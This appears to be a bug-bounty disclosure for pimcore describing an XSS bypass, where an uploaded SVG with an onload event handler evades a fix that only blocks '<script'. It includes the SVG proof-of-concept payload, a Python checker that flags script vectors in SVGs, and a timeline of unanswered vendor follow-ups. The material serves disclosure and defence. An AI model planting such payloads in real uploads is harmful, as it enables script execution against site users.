Exposure of Sensitive Information to an Unauthorized Actor in pimcore/pimcore
Status: Valid
Reported on: Jan 20th 2022
Description: XSS
Proof of Concept
The previous bug https://huntr.dev/bounties/96506857-06bc-4c84-88b7-4f397715bcf6/ is not properly fixed. It can be bypassed using an event handler. The fix in https://github.com/pimcore/pimcore/commit/35d1853baf64d6a1d90fd8803e52439da53a3911 only checks for a <script tag, which can be bypassed using an onload event handler.
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="alert()">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
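As an added, defender-side example that is not pimcore's code (written in Python rather than pimcore's PHP), the following contrasts the substring check the report describes with a check that walks the parsed SVG and flags event-handler attributes, script elements and script-capable href schemes. The function names are hypothetical and the sample input is a constructed copy of the report's proof of concept.

```python
import xml.etree.ElementTree as ET

# Constructed copy of the report's proof of concept: there is no <script> tag,
# but the onload handler on the root element runs when the image is rendered.
POC_SVG = b'''<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" onload="alert()">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>'''

# URL schemes in href/xlink:href that can execute code when followed.
SCRIPT_SCHEMES = ("javascript:", "data:", "vbscript:")


def naive_check(svg: bytes) -> bool:
    """The insufficient check the report describes: only looks for a <script tag."""
    return b"<script" in svg.lower()


def local_name(qualified: str) -> str:
    """Strip an ElementTree '{namespace}' prefix: '{http://...}href' -> 'href'."""
    return qualified.rsplit("}", 1)[-1]


def find_svg_script_vectors(svg: bytes) -> list[str]:
    """Parse the SVG and report every element or attribute that can run script.

    Names are compared case-insensitively: XML is case-sensitive, but an SVG
    that is later inlined into HTML is parsed by the case-insensitive HTML parser.
    """
    findings = []
    root = ET.fromstring(svg)  # expat does not fetch the external DTD by default
    for elem in root.iter():
        tag = local_name(elem.tag).lower()
        if tag in ("script", "foreignobject"):
            findings.append(f"<{tag}> element")
        for attr, value in elem.attrib.items():
            name = local_name(attr).lower()
            if name.startswith("on"):  # onload, onclick, onerror, onbegin, ...
                findings.append(f"<{tag} {name}=...> event handler")
            elif name == "href" and value.strip().lower().startswith(SCRIPT_SCHEMES):
                findings.append(f"<{tag} href> uses a script-capable URL scheme")
    return findings


def is_safe_svg(svg: bytes) -> bool:
    """Accept an upload only when no script vector was found."""
    return not find_svg_script_vectors(svg)
```

Rejecting on these findings is a minimal gate; serving uploaded SVGs with a Content-Disposition of attachment or rasterising them server-side removes the rendering path entirely.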
Timeline (each entry was shown as "5 months ago" when the page was captured):
We are processing your report and will contact the pimcore team within 24 hours.
We have contacted a member of the pimcore team and are waiting to hear back.
We have sent a follow up to the pimcore team. We will try again in 7 days.
We have sent a second follow up to the pimcore team. We will try again in 10 days.
We have sent a third and final follow up to the pimcore team. This report is now considered stale.